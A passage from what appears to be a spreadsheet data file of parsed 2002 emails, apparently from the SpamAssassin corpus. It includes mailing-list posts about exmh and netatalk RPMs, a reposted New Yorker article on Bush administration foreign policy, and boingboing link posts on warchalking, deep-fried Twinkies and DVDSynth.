 &gt; &gt; 	Mh_MarkSeen $exmh(folder) $msgid &gt; &gt;  &gt;  &gt; Thanks.  I'm not sure I'll need it with the new sequence code, but I &gt; might.  Does your new code commit sequences immediately?  The old code &gt; didn't, so I put that in to help keep my mh and exmh windows in sync. Yes it does. Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_-1249285507P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9kKD/K9b4h5R0IUIRAp9DAJsF2W+5cvbayu3szYhYW7TUdAb64QCfT3/t vgMbAAyyOjJW465cwD6wpfk= =0Rwl -----END PGP SIGNATURE----- --==_Exmh_-1249285507P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: freshrpms &lt;rpm-zzzlist@freshrpms.net&gt;\nFrom: Troy Engel &lt;tengel@fluid.com&gt;\nDate: Tue, 24 Sep 2002 10:57:38 -0700</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 10:57:38 -0700</t>
  </si>
  <si>
    <t>Troy Engel &lt;tengel@fluid.com&gt;</t>
  </si>
  <si>
    <t>freshrpms &lt;rpm-zzzlist@freshrpms.net&gt;</t>
  </si>
  <si>
    <t>netatalk-1.5.5-1rh7</t>
  </si>
  <si>
    <t>Hi folks, I just uploaded RPMS of the new netatalk 1.5.5 released  yesterday, thought folks here might be interested.  This release fixes a  nastygram in saving files via Illustrator that I personally have been  waiting for....    [URL]http://ftp.falsehope.com[/URL] (will be mirrored on rpmfind.net by tomorrow, usually). -te --  Troy Engel, Systems Engineer Cool as the other side of the pillow _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://ftp.falsehope.com http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: Flatware or Road Kill? &lt;FoRK@xent.com&gt;\nFrom: Rodent of Unusual Size &lt;Ken.Coar@Golux.Com&gt;\nDate: Tue, 24 Sep 2002 10:14:41 -0400</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 10:14:41 -0400</t>
  </si>
  <si>
    <t>A different sort of Fox News</t>
  </si>
  <si>
    <t>This was just *too* funny.. rotflma.\n\n[URL]http://www.ozyandmillie.org[/URL]\n-- \n#ken	P-)}\n\nKen Coar, Sanagendamgagwedweinini  [URL]http://Golux.Com[/URL]\nAuthor, developer, opinionist      [URL]http://Apache-Server.Com[/URL]\n\n"Millennium hand and shrimp!"</t>
  </si>
  <si>
    <t>http://www.ozyandmillie.org http://Golux.Com http://Apache-Server.Com</t>
  </si>
  <si>
    <t>To: Digital Bearer Settlement List &lt;dbs@philodox.com&gt;, fork@spamassassin.taint.org\nFrom: "R. A. Hettinga" &lt;rah@shipwright.com&gt;\nDate: Tue, 24 Sep 2002 09:52:15 -0400</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 09:52:15 -0400</t>
  </si>
  <si>
    <t>The Next World Order</t>
  </si>
  <si>
    <t xml:space="preserve">[URL]http://newyorker.com[/URL] The New Yorker THE NEXT WORLD ORDER by NICHOLAS LEMANN The Bush Administration may have a brand-new doctrine of power. Issue of 2002-04-01 Posted 2002-03-25 When there is a change of command-and not just in government-the new people often persuade themselves that the old people were much worse than anyone suspected. This feeling seems especially intense in the Bush Administration, perhaps because Bill Clinton has been bracketed by a father-son team. It's easy for people in the Administration to believe that, after an unfortunate eight-year interlude, the Bush family has resumed its governance-and about time, too. The Bush Administration's sense that the Clinton years were a waste, or worse, is strongest in the realms of foreign policy and military affairs. Republicans tend to regard Democrats as untrustworthy in defense and foreign policy, anyway, in ways that coincide with what people think of as Clinton's weak points: an eagerness to please, a lack of discipline. Condoleezza Rice, Bush's national-security adviser, wrote an article in Foreign Affairs two years ago in which she contemptuously accused Clinton of "an extraordinary neglect of the fiduciary responsibilities of the commander in chief." Most of the top figures in foreign affairs in this Administration also served under the President's father. They took office last year, after what they regard as eight years of small-time flyswatting by Clinton, thinking that they were picking up where they'd left off. Not long ago, I had lunch with-sorry!-a senior Administration foreign-policy official, at a restaurant in Washington called the Oval Room. Early in the lunch, he handed me a twenty-seven- page report, whose cover bore the seal of the Department of Defense, an outline map of the world, and these words: Defense Strategy for the 1990s: The Regional Defense Strategy Secretary of Defense Dick Cheney January 1993 One of the difficulties of working at the highest level of government is communicating its drama. Actors, professional athletes, and even elected politicians train for years, go through a great winnowing, and then perform publicly. People who have titles like Deputy Assistant Secretary of Defense are just as ambitious and competitive, have worked just as long and hard, and are often playing for even higher stakes-but what they do all day is go to meetings and write memos and prepare briefings. How, possibly, to explain that some of the documents, including the report that the senior official handed me, which was physically indistinguishable from a high-school term paper, represent the government version of playing Carnegie Hall? After the fall of the Berlin Wall, Dick Cheney, then the Secretary of Defense, set up a "shop," as they say, to think about American foreign policy after the Cold War, at the grand strategic level. The project, whose existence was kept quiet, included people who are now back in the game, at a higher level: among them, Paul Wolfowitz, the Deputy Secretary of Defense; Lewis Libby, Cheney's chief of staff; and Eric Edelman, a senior foreign-policy adviser to Cheney-generally speaking, a cohesive group of conservatives who regard themselves as bigger-thinking, tougher-minded, and intellectually bolder than most other people in Washington. (Donald Rumsfeld, the Secretary of Defense, shares these characteristics, and has been closely associated with Cheney for more than thirty years.) Colin Powell, then the chairman of the Joint Chiefs of Staff, mounted a competing, and presumably more ideologically moderate, effort to reimagine American foreign policy and defense. A date was set-May 21, 1990-on which each team would brief Cheney for an hour; Cheney would then brief President Bush, after which Bush would make a foreign-policy address unveiling the new grand strategy. Everybody worked for months on the "five-twenty-one brief," with a sense that the shape of the post-Cold War world was at stake. When Wolfowitz and Powell arrived at Cheney's office on May 21st, Wolfowitz went first, but his briefing lasted far beyond the allotted hour, and Cheney (a hawk who, perhaps, liked what he was hearing) did not call time on him. Powell didn't get to present his alternate version of the future of the United States in the world until a couple of weeks later. Cheney briefed President Bush, using material mostly from Wolfowitz, and Bush prepared his major foreign-policy address. But he delivered it on August 2, 1990, the day that Iraq invaded Kuwait, so nobody noticed. The team kept working. In 1992, the Times got its hands on a version of the material, and published a front-page story saying that the Pentagon envisioned a future in which the United States could, and should, prevent any other nation or alliance from becoming a great power. A few weeks of controversy ensued about the Bush Administration's hawks being "unilateral"-controversy that Cheney's people put an end to with denials and the counter-leak of an edited, softer version of the same material. As it became apparent that Bush was going to lose to Clinton, the Cheney team's efforts took on the quality of a parting shot. The report that the senior official handed me at lunch had been issued only a few days before Clinton took office. It is a somewhat bland, opaque document-a "scrubbed," meaning unclassified, version of something more candid-but it contained the essential ideas of "shaping," rather than reacting to, the rest of the world, and of preventing the rise of other superpowers. Its tone is one of skepticism about diplomatic partnerships. A more forthright version of the same ideas can be found in a short book titled "From Containment to Global Leadership?," which Zalmay Khalilzad, who joined Cheney's team in 1991 and is now special envoy to Afghanistan, published a couple of years into the Clinton Administration, when he was out of government. It recommends that the United States "preclude the rise of another global rival for the indefinite future." Khalilzad writes, "It is a vital U.S. interest to preclude such a development-i.e., to be willing to use force if necessary for the purpose." When George W. Bush was campaigning for President, he and the people around him didn't seem to be proposing a great doctrinal shift, along the lines of the policy of containment of the Soviet Union's sphere of influence which the United States maintained during the Cold War. In his first major foreign-policy speech, delivered in November of 1999, Bush declared that "a President must be a clear-eyed realist," a formulation that seems to connote an absence of world-remaking ambition. "Realism" is exactly the foreign-policy doctrine that Cheney's Pentagon team rejected, partly because it posits the impossibility of any one country's ever dominating world affairs for any length of time. One gets many reminders in Washington these days of how much the terrorist attacks of September 11th have changed official foreign-policy thinking. Any chief executive, of either party, would probably have done what Bush has done so far-made war on the Taliban and Al Qaeda and enhanced domestic security. It is only now, six months after the attacks, that we are truly entering the realm of Presidential choice, and all indications are that Bush is going to use September 11th as the occasion to launch a new, aggressive American foreign policy that would represent a broad change in direction rather than a specific war on terrorism. All his rhetoric, especially in the two addresses he has given to joint sessions of Congress since September 11th, and all the information about his state of mind which his aides have leaked, indicate that he sees this as the nation's moment of destiny-a perception that the people around him seem to be encouraging, because it enhances Bush's stature and opens the way to more assertive policymaking. Inside government, the reason September 11th appears to have been "a transformative moment," as the senior official I had lunch with put it, is not so much that it revealed the existence of a threat of which officials had previously been unaware as that it drastically reduced the American public's usual resistance to American military involvement overseas, at least for a while. The Clinton Administration, beginning with the "Black Hawk Down" operation in Mogadishu, during its first year, operated on the conviction that Americans were highly averse to casualties; the all-bombing Kosovo operation, in Clinton's next-to-last year, was the ideal foreign military adventure. Now that the United States has been attacked, the options are much broader. The senior official approvingly mentioned a 1999 study of casualty aversion by the Triangle Institute for Security Studies, which argued that the "mass public" is much less casualty-averse than the military or the civilian lite believes; for example, the study showed that the public would tolerate thirty thousand deaths in a military operation to prevent Iraq from acquiring weapons of mass destruction. (The American death total in the Vietnam War was about fifty-eight thousand.) September 11th presumably reduced casualty aversion even further. Recently, I went to the White House to interview Condoleezza Rice. Rice's Foreign Affairs article from 2000 begins with this declaration: "The United States has found it exceedingly difficult to define its 'national interest' in the absence of Soviet power." I asked her whether that is still the case. "I think the difficulty has passed in defining a role," she said immediately. "I think September 11th was one of those great earthquakes that clarify and sharpen. Events are in much sharper relief." Like Bush, she said that opposing terrorism and preventing the accumulation of weapons of mass destruction "in the hands of irresponsible states" now define the national interest. (The latter goal, by the way, is new-in Bush's speech to Congress on September 20th, America's sole grand purpose was ending terrorism.) We talked in her West Wing office; its tall windows face the part of the White House grounds where television reporters do their standups. In her bearing, Rice seemed less crisply military than she does in public. She looked a little tired, but she was projecting a kind of missionary calm, rather than belligerence. In the Foreign Affairs article, Rice came across as a classic realist, putting forth "the notions of power politics, great powers, and power balances" as the proper central concerns of the United States. Now she sounded as if she had moved closer to the one-power idea that Cheney's Pentagon team proposed ten years ago-or, at least, to the idea that the other great powers are now in harmony with the United States, because of the terrorist attacks, and can be induced to remain so. "Theoretically, the realists would predict that when you have a great power like the United States it would not be long before you had other great powers rising to challenge it or trying to balance against it," Rice said. "And I think what you're seeing is that there's at least a predilection this time to move to productive and coperative relations with the United States, rather than to try to balance the United States. I actually think that statecraft matters in how it all comes out. It's not all foreordained." Rice said that she had called together the senior staff people of the National Security Council and asked them to think seriously about "how do you capitalize on these opportunities" to fundamentally change American doctrine, and the shape of the world, in the wake of September 11th. "I really think this period is analogous to 1945 to 1947," she said-that is, the period when the containment doctrine took shape-"in that the events so clearly demonstrated that there is a big global threat, and that it's a big global threat to a lot of countries that you would not have normally thought of as being in the coalition. That has started shifting the tectonic plates in international politics. And it's important to try to seize on that and position American interests and institutions and all of that before they harden again." The National Security Council is legally required to produce an annual document called the National Security Strategy, stating the over-all goals of American policy-another government report whose importance is great but not obvious. The Bush Administration did not produce one last year, as the Clinton Administration did not in its first year. Rice said that she is working on the report now. "There are two ways to handle this document," she told me. "One is to do it in a kind of minimalist way and just get it out. But it's our view that, since this is going to be the first one for the Bush Administration, it's important. An awful lot has happened since we started this process, prior to 9/11. I can't give you a certain date when it's going to be out, but I would think sometime this spring. And it's important that it be a real statement of what the Bush Administration sees as the strategic direction that it's going." It seems clear already that Rice will set forth the hope of a more dominant American role in the world than she might have a couple of years ago. Some questions that don't appear to be settled yet, but are obviously being asked, are how much the United States is willing to operate alone in foreign affairs, and how much change it is willing to try to engender inside other countries-and to what end, and with what means. The leak a couple of weeks ago of a new American nuclear posture, adding offensive capability against "rogue states," departed from decades of official adherence to a purely defensive position, and was just one indication of the scope of the reconsideration that is going on. Is the United States now in a position to be redrawing regional maps, especially in the Middle East, and replacing governments by force? Nobody thought that the Bush Administration would be thinking in such ambitious terms, but plainly it is, and with the internal debate to the right of where it was only a few months ago. Just before the 2000 election, a Republican foreign-policy figure suggested to me that a good indication of a Bush Administration's direction in foreign affairs would be who got a higher-ranking job, Paul Wolfowitz or Richard Haass. Haass is another veteran of the first Bush Administration, and an intellectual like Wolfowitz, but much more moderate. In 1997, he published a book titled "The Reluctant Sheriff," in which he poked a little fun at Wolfowitz's famous strategy briefing of the early nineties (he called it the "Pentagon Paper") and disagreed with its idea that the United States should try to be the world's only great power over the long term. "For better or worse, such a goal is beyond our reach," Haass wrote. "It simply is not doable." Elsewhere in the book, he disagreed with another of the Wolfowitz team's main ideas, that of the United States expanding the "democratic zone of peace": "Primacy is not to be confused with hegemony. The United States cannot compel others to become more democratic." Haass argued that the United States is becoming less dominant in the world, not more, and suggested "a revival of what might be called traditional great-power politics." Wolfowitz got a higher-ranking job than Haass: he is Deputy Secretary of Defense, and Haass is Director of Policy Planning for the State Department- in effect, Colin Powell's big-think guy. Recently, I went to see him in his office at the State Department. On the wall of his waiting room was an array of photographs of every past director of the policy-planning staff, beginning with George Kennan, the father of the containment doctrine and the first holder of the office that Haass now occupies. It's another indication of the way things are moving in Washington that Haass seems to have become more hawkish. I mentioned the title of his book. "Using the word 'reluctant' was itself reflective of a period when foreign policy seemed secondary, and sacrificing for foreign policy was a hard case to make," he said. "It was written when Bill Clinton was saying, 'It's the economy, stupid'-not 'It's the world, stupid.' Two things are very different now. One, the President has a much easier time making the case that foreign policy matters. Second, at the top of the national-security charts is this notion of weapons of mass destruction and terrorism." I asked Haass whether there is a doctrine emerging that is as broad as Kennan's containment. "I think there is," he said. "What you're seeing from this Administration is the emergence of a new principle or body of ideas-I'm not sure it constitutes a doctrine-about what you might call the limits of sovereignty. Sovereignty entails obligations. One is not to massacre your own people. Another is not to support terrorism in any way. If a government fails to meet these obligations, then it forfeits some of the normal advantages of sovereignty, including the right to be left alone inside your own territory. Other governments, including the United States, gain the right to intervene. In the case of terrorism, this can even lead to a right of preventive, or peremptory, self-defense. You essentially can act in anticipation if you have grounds to think it's a question of when, and not if, you're going to be attacked." Clearly, Haass was thinking of Iraq. "I don't think the American public needs a lot of persuading about the evil that is Saddam Hussein," he said. "Also, I'd fully expect the President and his chief lieutenants to make the case. Public opinion can be changed. We'd be able to make the case that this isn't a discretionary action but one done in self-defense." On the larger issue of the American role in the world, Haass was still maintaining some distance from the hawks. He had made a speech not long before called "Imperial America," but he told me that there is a big difference between imperial and imperialist. "I just think that we have to be a little bit careful," he said. "Great as our advantages are, there are still limits. We have to have allies. We can't impose our ideas on everyone. We don't want to be fighting wars alone, so we need others to join us. American leadership, yes; but not American unilateralism. It has to be multilateral. We can't win the war against terror alone. We can't send forces everywhere. It really does have to be a collaborative endeavor." He stopped for a moment. "Is there a successor idea to containment? I think there is," he said. "It is the idea of integration. The goal of U.S. foreign policy should be to persuade the other major powers to sign on to certain key ideas as to how the world should operate: opposition to terrorism and weapons of mass destruction, support for free trade, democracy, markets. Integration is about locking them into these policies and then building institutions that lock them in even more." The first, but by no means the last, obvious manifestation of a new American foreign policy will be the effort to remove Saddam Hussein. What the United States does in an Iraq operation will very likely dwarf what's been done so far in Afghanistan, both in terms of the scale of the operation itself and in terms of its aftermath. Several weeks ago, Ahmad Chalabi, the head of the Iraqi National Congress, the Iraqi opposition party, came through Washington with an entourage of his aides. Chalabi went to the State Department and the White House to ask, evidently successfully, for more American funding. His main public event was a panel discussion at the American Enterprise Institute. Chalabi's leading supporter in town, Richard Perle, the prominent hawk and former Defense Department official, acted as moderator. Smiling and supremely confident, Perle opened the discussion by saying, "Evidence is mounting that the Administration is looking very carefully at strategies for dealing with Saddam Hussein." The war on terrorism, he said, will not be complete "until Saddam is successfully dealt with. And that means replacing his regime. . . . That action will be taken, I have no doubt." Chalabi, who lives in London, is a charming, suave middle-aged man with a twinkle in his eye. He was dressed in a double-breasted pin-striped suit and a striped shirt with a white spread collar. Although he and his supporters argue that the Iraqi National Congress, with sufficient American support, can defeat Saddam just as the Northern Alliance defeated the Taliban in Afghanistan, this view hasn't won over most people in Washington. It isn't just that Chalabi doesn't look the part of a rebel military leader ("He could fight you for the last petit four on the tray over tea at the Savoy, but that's about it," one skeptical former Pentagon official told me), or that he isn't in Iraq. It's also that Saddam's military is perhaps ten times the size that the Taliban's was, and has been quite successful at putting down revolts over the last decade. The United States left Iraq in 1991 believing that Saddam might soon fall to an internal rebellion; Chalabi's supporters believe that Saddam is much weaker now, and that even signs that a serious operation was in the offing could finish him off. But non-true believers seem to be coming around to the idea that a military operation against Saddam would mean the deployment of anywhere from a hundred thousand to three hundred thousand American ground troops. Kenneth Pollack, a former C.I.A. analyst who was the National Security Council's staff expert on Iraq during the last years of the Clinton Administration, recently caused a stir in the foreign-policy world by publishing an article in Foreign Affairs calling for war against Saddam. This was noteworthy because three years ago Pollack and two co-authors published an article, also in Foreign Affairs, arguing that the Iraqi National Congress was incapable of defeating Saddam. Pollack still doesn't think Chalabi can do the job. He believes that it would require a substantial American ground, air, and sea force, closer in size to the one we used in Kuwait in 1990-91 than to the one we are using now in Afghanistan. Pollack, who is trim, quick, and crisp, is obviously a man who has given a briefing or two in his day. When I went to see him at his office in Washington, with a little encouragement he got out from behind his desk and walked over to his office wall, where three maps of the Middle East were hanging. "The only way to do it is a full-scale invasion," he said, using a pen as a pointer. "We're talking about two grand corps, two to three hundred thousand people altogether. The population is here, in the Tigris-Euphrates valley." He pointed to the area between Baghdad and Basra. "Ideally, you'd have the Saudis on board." He pointed to the Prince Sultan airbase, near Riyadh. "You could make Kuwait the base, but it's much easier in Saudi. You need to take western Iraq and southern Iraq"-pointing again-"because otherwise they'll fire Scuds at Israel and at the Saudi oil fields. You probably want to prevent Iraq from blowing up its own oil fields, so troops have to occupy them. And you need troops to defend the Kurds in northern Iraq." Point, point. "You go in as hard as you can, as fast as you can." He slapped his hand on the top of his desk. "You get the enemy to divide his forces, by threatening him in two places at once." His hand hit the desk again, hard. "Then you crush him." Smack. That would be a reverberating blow. The United States has already removed the government of one country, Afghanistan, the new government is obviously shaky, and American military operations there are not completed. Pakistan, which before September 11th clearly met the new test of national unacceptability (it both harbors terrorists and has weapons of mass destruction), will also require long-term attention, since the country is not wholly under the control of the government, as the murder of Daniel Pearl demonstrated, and even parts of the government, like the intelligence service, may not be entirely under the control of the President. In Iraq, if America invades and brings down Saddam, a new government must be established-an enormous long-term task in a country where there is no obvious, plausible new leader. The prospective Iraq operation has drawn strong objections from the neighboring nations, one of which, Russia, is a nuclear superpower. An invasion would have a huge effect on the internal affairs of all the biggest Middle Eastern nations: Iran, Turkey, Saudi Arabia, and even Egypt. Events have forced the Administration to become directly involved in the Israeli-Palestinian conflict, as it hadn't wanted to do. So it's really the entire region that is in play, in much the way that Europe was immediately after the Second World War. In September, Bush rejected Paul Wolfowitz's recommendation of immediate moves against Iraq. That the President seems to have changed his mind is an indication, in part, of the bureaucratic skill of the Administration's conservatives. "These guys are relentless," one former official, who is close to the high command at the State Department, told me. "Resistance is futile." The conservatives' other weapon, besides relentlessness, is intellectualism. Colin Powell tends to think case by case, and since September 11th the conservatives have outflanked him by producing at least the beginning of a coherent, hawkish world view whose acceptance practically requires invading Iraq. If the United States applies the doctrines of Cheney's old Pentagon team, "shaping" and expanding "the zone of democracy," the implications would extend far beyond that one operation. The outside experts on the Middle East who have the most credibility with the Administration seem to be Bernard Lewis, of Princeton, and Fouad Ajami, of the Johns Hopkins School of Advanced International Studies, both of whom see the Arab Middle East as a region in need of radical remediation. Lewis was invited to the White House in December to brief the senior foreign-policy staff. "One point he made is, Look, in that part of the world, nothing matters more than resolute will and force," the senior official I had lunch with told me-in other words, the United States needn't proceed gingerly for fear of inflaming the "Arab street," as long as it is prepared to be strong. The senior official also recommended as interesting thinkers on the Middle East Charles Hill, of Yale, who in a recent essay declared, "Every regime of the Arab-Islamic world has proved a failure," and Reuel Marc Gerecht, of the American Enterprise Institute, who published an article in The Weekly Standard about the need for a change of regime in Iran and Syria. (Those goals, Gerecht told me when we spoke, could be accomplished through pressure short of an invasion.) Several people I spoke with predicted that most, or even all, of the nations that loudly oppose an invasion of Iraq would privately cheer it on, if they felt certain that this time the Americans were really going to finish the job. One purpose of Vice-President Cheney's recent diplomatic tour of the region was to offer assurances on that matter, while gamely absorbing all the public criticism of an Iraq operation. In any event, the Administration appears to be committed to acting forcefully in advance of the world's approval. When I spoke to Condoleezza Rice, she said that the United States should assemble "coalitions of the willing" to support its actions, rather than feel it has to work within the existing infrastructure of international treaties and organizations. An invasion of Iraq would test that policy in more ways than one: the Administration would be betting that it can continue to eliminate Al Qaeda cells in countries that publicly opposed the Iraq operation. When the Administration submitted its budget earlier this year, it asked for a forty-eight-billion-dollar increase in defense spending for fiscal 2003, which begins in October, 2002. Much of that sum would go to improve military pay and benefits, but ten billion dollars of it is designated as an unspecified contingency fund for further operations in the war on terrorism. That's probably at least the initial funding for an invasion of Iraq. This spring, the Administration will be talking to other countries about the invasion, trying to secure basing and overflight privileges, while Bush builds up a rhetorical case for it by giving speeches about the unacceptability of developing weapons of mass destruction. A drama involving weapons inspections in Iraq will play itself out over the spring and summer, and will end with the United States declaring that the terms that Saddam offers for the inspections, involving delays and restrictions, are unacceptable. Then, probably in the late summer or early fall, the enormous troop positioning, which will take months, will begin. The Administration obviously feels confident that the United States can effectively parry whatever aggressive actions Saddam takes during the troop buildup, and hopes that its moves will destabilize Iraq enough to cause the Republican Guard, the military key to the country, to turn against Saddam and topple him on its own. But the chain of events leading inexorably to a full-scale American invasion, if it hasn't already begun, evidently will begin soon. Lewis (Scooter) Libby, who was the principal drafter of Cheney's future-of-the-world documents during the first Bush Administration, now works in an office in the Old Executive Office Building, overlooking the West Wing, where he has a second, smaller office. A packet of public-relations material prompted by the recent paperback publication of his 1996 novel, "The Apprentice," quotes the Times' calling him "Dick Cheney's Dick Cheney," which seems like an apt description: he appears absolutely sure of himself, and, whether by coincidence or as a result of the influence of his boss, speaks in a tough, confidential, gravelly rumble. Like Condoleezza Rice and Bush himself, he gives the impression of having calmly accepted the idea that the project of war and reconstruction which the Administration has now taken on may be a little exhausting for those charged with carrying it out but is unquestionably right, the only truly prudent course. When I went to see Libby, not long ago, I asked him whether, before September 11th, American policy toward terrorism should have been different. He went to his desk and got out a large black loose-leaf binder, filled with typewritten sheets interspersed with foldout maps of the Middle East. He looked through it for a long minute, formulating his answer. "Let us stack it up," he said at last. "Somalia, 1993; 1994, the discovery of the Al Qaeda-related plot in the Philippines; 1993, the World Trade Center, first bombing; 1993, the attempt to assassinate President Bush, former President Bush, and the lack of response to that, the lack of a serious response to that; 1995, the Riyadh bombing; 1996, the Khobar bombing; 1998, the Kenyan embassy bombing and the Tanzanian embassy bombing; 1999, the plot to launch millennium attacks; 2000, the bombing of the Cole. Throughout this period, infractions on inspections by the Iraqis, and eventually the withdrawal of the entire inspection regime; and the failure to respond significantly to Iraqi incursions in the Kurdish areas. No one would say these challenges posed easy problems, but if you take that long list and you ask, 'Did we respond in a way which discouraged people from supporting terrorist activities, or activities clearly against our interests? Did we help to shape the environment in a way which discouraged further aggressions against U.S. interests?,' many observers conclude no, and ask whether it was then easier for someone like Osama bin Laden to rise up and say credibly, 'The Americans don't have the stomach to defend themselves. They won't take casualties to defend their interests. They are morally weak.' " Libby insisted that the American response to September 11th has not been standard or foreordained. "Look at what the President has done in Afghanistan," he said, "and look at his speech to the joint session of Congress"-meaning the State of the Union Message, in January. "He made it clear that it's an important area. He made it clear that we believe in expanding the zone of democracy even in this difficult part of the world. He made it clear that we stand by our friends and defend our interests. And he had the courage to identify those states which present a problem, and to begin to build consensus for action that would need to be taken if there is not a change of behavior on their part. Take the Afghan case, for example. There are many </t>
  </si>
  <si>
    <t>http://newyorker.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 24 Sep 2002 08:00:39 -0000</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 08:00:39 -0000</t>
  </si>
  <si>
    <t>Warchalking FAQ</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nAaron Swartz has written up a warchalking FAQ that addresses the shibboleths \nand paranoia about discovering, marking and using wireless connectivity. \n\n    Is that illegal? \n\n    Although I am not a lawyer, I don't think it's illegal to make chalk marks \n    on the sidewalk. I know a lot of hopscotch players who'd be worried if it \n    was... \n\n    Well, is it immoral? \n\n    Not at all! Warchalking is a helpful service to assist people in finding \n    something they need (an Internet connection).  \n\nLink[1] Discuss[2]\n\n[1] [URL]http://www.warchalking.org[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.warchalking.org http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 24 Sep 2002 08:00:38 -0000</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 08:00:38 -0000</t>
  </si>
  <si>
    <t>Deep-fried Twinkies take America by goo</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nCarny concessionaires have taken to selling deep-friend Twinkies, doing big \nbusiness with artery-clogging horripilations: \n\n    In what may be the biggest setback for the war on fat since supersize \n    fries, Americans are scarfing down thousands of the gooey, calorie-laden \n    snack cakes at county fairs and restaurants across the country. \n\n    "We sold 26,000 Twinkies in 18 days. People drove for hours just to taste \n    our Twinkie," said Rocky Mullen, who sells the deep-fried, cream-filled \n    treats for $3 (U.S.) each at the Payallup Fair, 50 kilometres south of \n    Seattle. \n\n    As if Twinkies are not sweet enough already, vendors such as Mr. Mullen add \n    chocolate or berry sauce and sprinkle powdered sugar on top... \n\n    Hearing about Mr. Sell's invention, Hostess, the company that makes the \n    71-year-old snack, started promoting deep-fried Twinkies to state and \n    county fairs, where a captive population of junk-food addicts began \n    gobbling them up between pig races and tractor-pull competitions. \n\n    How bad are they for your health? After deep-frying, a Twinkie packs an \n    estimated 400 calories and 28 grams of fat.  \n\nLink[1] Discuss[2]\n\n[1] [URL]http://www.globeandmail.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.globeandmail.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>Google Domain Suffix Census</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nThe good folks at ResearchBuzz have released a groovy Google API tool, "The \nSuffix Census." Enter your search terms, and the census will tell you how many \nof the results are in .NET, .COM, .ORG, and other top-level domains. Link[1] \nDiscuss[2] (_via ResearchBuzz[3]_)\n\n[1] [URL]http://www.buzztoolbox.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://www.researchbuzz.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.buzztoolbox.com http://www.quicktopic.com http://www.researchbuzz.com</t>
  </si>
  <si>
    <t>Turning junk computers into activist gold</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nGreat article on a group of East Bay activists who rehab junk computers, using \nsemi-skilled volunteers who train other semi-skilled volunteers. The resulting \ncomputers are sent to the developing world for activist use. \n\n    For the Amazonian villages where there's no electricity or where phone \n    lines are scarce, the activists plan to set up free computer labs in the \n    nearby cities. Many cities already have commercial Internet cafes, but they \n    cost about a dollar per hour of use, Henshaw-Plath says, which is about a \n    day's wage for most of the population. \n\n    The IMC activists plan to ship off these computers to Guayaquil, Ecuador's \n    main port city, by the end of September. Because none of the computers are \n    being sold in Ecuador, and because they're being transferred from an \n    American nonprofit to an Ecuadorian one, the activists won't be charged any \n    international shipping duties on the computers. "It's what you call real \n    free trade," says Eddie Nix.  \n\nLink[1] Discuss[2] (_Thanks, Markoffcharney!_)\n\n[1] [URL]http://www.salon.com[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.salon.com http://www.quicktopic.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 24 Sep 2002 08:00:37 -0000</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 08:00:37 -0000</t>
  </si>
  <si>
    <t>Great DVD interaction tool, probably illegal</t>
  </si>
  <si>
    <t>URL: [URL]http://boingboing.net[/URL]\nDate: Not supplied\n\nDVDSynth is an open source project that allows you to splice in your own \nfootage, alternate audio, subtitles, etc, to any DVD. This means that you can \ninsert your own non-sucky subtitles, make and circulate edit-lists that make \nhighlight reels for your favorite movies, etc, etc. It all amounts to a sweet \ntool for making the audience into the _former audience_, participants in \nentertainment. Of course, it's also illegal under the DMCA, since the tool also \nnecessarily circumvents the copy-prevention in pre-recorded DVDs to accomplish \nits ends. Link[1] Discuss[2] (_via NTK[3]_)\n\n[1] [URL]http://www.roundelay.net[/URL]\n[2] [URL]http://www.quicktopic.com[/URL]\n[3] [URL]http://www.ntk.net[/URL]</t>
  </si>
  <si>
    <t>http://boingboing.net http://www.roundelay.net http://www.quicktopic.com http://www.ntk.net</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: boingboing &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Tue, 24 Sep 2002 08:00:36 -0000</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 08:00:36 -0000</t>
  </si>
  <si>
    <t>San Francisco caffeine tour</t>
  </si>
  <si>
